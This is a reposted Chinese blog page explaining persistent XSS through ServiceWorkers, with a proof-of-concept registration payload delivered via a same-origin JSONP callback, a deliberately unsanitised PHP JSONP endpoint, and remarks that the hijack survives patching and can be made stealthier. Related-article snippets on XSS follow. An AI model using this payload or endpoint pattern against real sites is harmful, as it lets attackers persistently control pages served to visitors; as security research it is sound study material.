持久化 XSS:ServiceWorkers 利用

最新推荐文章于 2022-08-23 14:01:23 发布
最新推荐文章于 2022-08-23 14:01:23 发布
阅读量329 收藏
点赞数
文章标签: php javascript ViewUI
原文链接:http://www.cnblogs.com/yangxiaodi/p/7381411.html
版权

来源:http://www.mottoin.com/95058.html

来源:https://www.owasp.org/images/3/35/2017-04-20-JSONPXSS.pdf

 

ServiceWorkers 看完好像需要三个条件。 1.只在 HTTPS 下工作 2.安装ServiceWorker的脚本需要当前域下,且返回的 content-type 包含 /javascript。(也就是一个jsonp)。3.一个xss

 

先用xss种下ServiceWorkers

被xss的页面-->xss.html

<script>
navigator.serviceWorker.register("/x0day/jsonp.php?callback=onfetch%3Dfunction(e)%7B%0Ae.respondWith(new%20Response(%27%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%27%2C%7Bheaders%3A%20%7B%27Content-Type%27%3A%27text%2Fhtml%27%7D%7D))%0A%7D%2F%2F");
</script>

  

同域下存在jsonp的地方,返回的content-type必须包含"/javascript" ,用php写一个;

<?php
	header('Content-type: text/javascript');
    $arr=array('a'=>1,'b'=>2,'c'=>3,'d'=>4,'e'=>5);
    $result=json_encode($arr);
    $callback=$_GET['callback'];
    echo $callback."($result)";
?>

  

 

 

这时候访问jsonp下的路径都能触发这个xss,也就是 https://y3d.pw/x0day/

 

 

 

 

 

相对的直接把response返回的内容直接替换成脚本比较暴力,容易被发现,可以参考长短短写的替换某个js连接。

这种xss的利用方式隐藏性较好,即使xss被补上去了,之前访问过的人还是能触发。

 

转载于:https://www.cnblogs.com/yangxiaodi/p/7381411.html

aixuan9365
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络攻防中黑客常用技术跨站脚本技术:持久型(存储)XSS 技术详解,目标设置、模糊测试框架、模糊测试模板、挖掘富文本存储型 XSS
代码讲故事
03-08 495
网络攻防中黑客常用技术跨站脚本技术:持久型(存储)XSS 技术详解,目标设置、模糊测试框架、模糊测试模板、挖掘富文本存储型 XSS。 持久型XSS(Persistent)又叫做存储XSS(Stored XSS),与非持久型XSS相反,它是指通过提交恶意数据到存储器(比如数据库、文本文件等),Web应用程序输出的时候是从存储器中读出恶意数据输出到页面的一类跨站脚本漏洞(csrf 写 + self-xss = 存储 xss)。
XSS学习笔记(二)(存储型XSS,持久型攻击)
byteway的专栏
04-20 1万+
持久型XSS攻击就是把攻击数据存进数据库,攻击行为就伴随着攻击数据一直存在,下面找来一个利用持久型攻击获取Session ID,同时向浏览器传送一个cookie,(这里科普一下,即使是使用了session验证的方法,还是需要客户端支持cookie), cookie会保存会话连接中的数据,Session ID作为会话标识,浏览器的后续请求就会基于后续请求,攻击者可以提供一个攻击链接,用户点击该链接时
发掘持久型XSS漏洞基础
qq_43776408的博客
10-25 453
持久性XSS是攻击者将代码永久贮存在服务器上,用户访问该页面就会被攻击 一个很典型的场面就是留言板 你所留的言会存储在后台数据库里 你可以在留言板输入<script>alert("XSS")</script>等js代码 然后后台管理员打开留言板时就会触发XSS攻击 如果没有显示出来可能就是你的留言被插入到testarea标签中 所以在你构造攻击代码时需要闭合text...
变种XSS:持久控制
swordheart的博客
04-27 393
0x00 引言 首先声明,这不是一个新洞,看过 Homakov 文章(最后附)以及译文的人想必对这种漏洞有所了解。 但原文写的太过简单(没有说明利用条件、情景和特性),且译文和我的理解略有偏差,于是就有了这篇文章。 这种漏洞已经存在一段时间了,有没有被利用过尚不得知,虽然利用条件较苛刻,但是当符合条件的站点被攻击后, 影响面和影响程度巨大,并且普通用户不知如何清除, 可导致长期持续攻击。 2014年底的时候,这种漏洞的利用条件没有现在苛刻(比如没有Service-Worker-Allowed头),一
XSS(跨站脚本攻击)详解
万物不及香香的博客
10-22 3426
XSS的原理和分类 跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击! XSS分为:存储型 、反射型 、DOM型XSS 存储型XSS:存储型XSS持久化,代码是存储在服务器中的,如在个人信.
xsstry:xss漏洞利用平台
06-10
**XSS漏洞利用平台——深入理解XSS与CSS在安全中的角色** XSS(Cross Site Scripting)漏洞是一种常见的网络安全问题,它允许攻击者在受害者的浏览器上执行恶意脚本。"xsstry"是一个用于XSS漏洞测试和利用的平台,...
第一节 自动化xss挖掘介绍-01
最新发布
09-15
自动化XSS挖掘工具xsser是用于自动化Web应用程序漏洞挖掘、利用和报告的框架,以下是对xsser工具的详细介绍。 xsser工具介绍 xsser是一款功能强大且灵活的自动化XSS挖掘工具,旨在帮助Web安全测试员和开发者快速...
xss_payloads:对 XSS利用
07-24
xss_payloads 用于实际开发跨站点脚本的有效负载。用法在您的应用中查找 XSS 漏洞获取 PoC 漏洞:alert(1) 等在某处托管这些有效载荷使用 vuln 将这些负载之一拉入应用程序[removed][removed] 利润js vs ...
anti-xss:AntiAntiXSS | 通过PHP防止跨站点脚本(XSS
05-02
:Japanese_secret_button: 反XSS “跨站点脚本(XSS)是一种通常在Web应用程序中发现的计算机安全漏洞。XSS使攻击者能够将客户端脚本注入到其他用户查看的网页中。跨站点脚本漏洞可能被攻击者用来绕过相同原产地策略...
XSSer:自动化XSS漏洞检测及利用工具
09-04
XSSer:自动化XSS漏洞检测及利用工具 跨站点“Scripter”(又名XSSer)是一个自动化框架,用于检测、利用以及报告基于Web应用程序 中的XSS漏洞。 它包含多个尝试绕过某些过滤器的选项,以及各种特殊的代码注入技术。
XSS跨站脚本】存储型XSS(持久型)
08-23 1744
XSS跨站脚本】存储型XSS
XSS攻击
qq_42642159的博客
05-29 113
https://blog.csdn.net/hxpjava1/article/details/81005195
OWASP TOP 10
weixin_39216626的博客
08-26 220
OWASP TOP 10 OWASP 是一个开放的Web安全社区,影响着Web安全的方方面面,OWASP每隔一段时间就会整理更新一次 “Top 10” 的Web漏洞排名,对当前实际环境常见的漏洞进行罗列,虽然漏洞排名经常引起业界的争议,但是在开源环境下,该计划公布的漏洞也能够客观反映实际场景中的某些问题。 1、注入 用一个不严谨的说法来形容注入攻击,就是,本应该处理用户输入字符的代码,将 用户输入...
Session的持久化
xss23into的专栏
06-05 131
      为了提高服务器内存资源的利用率,WEB服务器通常将那些暂时不活动但未超时的HttpSession对象转移到文件系统或数据库中保存,一旦服务器需要使用它们时,再将它们从文件系统或数据库中装载进内存,这种技术称为Session的持久化。       将HttpSession对象保存到文件系统或数据库中时,需要采用序列化的方式将HttpSession对象中的每个属性对象保存到文件系统或数...
反射型XSS利用
热门推荐
u011975363的专栏
11-26 1万+
反射型XSS:用户输入的恶意代码,被执行。 利用:它通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。 以前一直觉得反射型XSS危害不大,只能自己在客户端玩玩,实现弹窗。 没想到,反射型XSS利用比存储型还更容易,存储型XSS利用还需结合CSRF. 这篇博客很好的讲述了反射型XS...
【Web安全黑铁到传说】五.常见漏洞攻防之XSS篇基础详解(数据源、保护、持续化)
MachineGunJoe666
05-31 1986
4.2. XSS 4.2.1.1. 简介 XSS全称为Cross Site Scripting,为了和CSS分开简写为XSS,中文名为跨站脚本。该漏洞发生在用户端,是指在渲染过程中发生了不在预期过程中的JavaScript代码执行。XSS通常被用于获取Cookie、以受攻击者的身份进行操作等行为。 4.2.1.2. 反射型XSS 反射型XSS是比较常见和广泛的一类,举例来说,当一个网站的代码中包含类似下面的语句:<?phpecho"<p>hello,$_GET['user']...
XSS高级实战:从基础到深度利用
XSS攻击的核心是利用了网站对用户输入数据的信任,未进行充分的过滤或编码处理,导致恶意脚本能够被浏览器执行。 在本教程的第一节中,作者以一个简单的实例展示了未过滤XSS漏洞的基本情况。这个例子中,输入参数...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值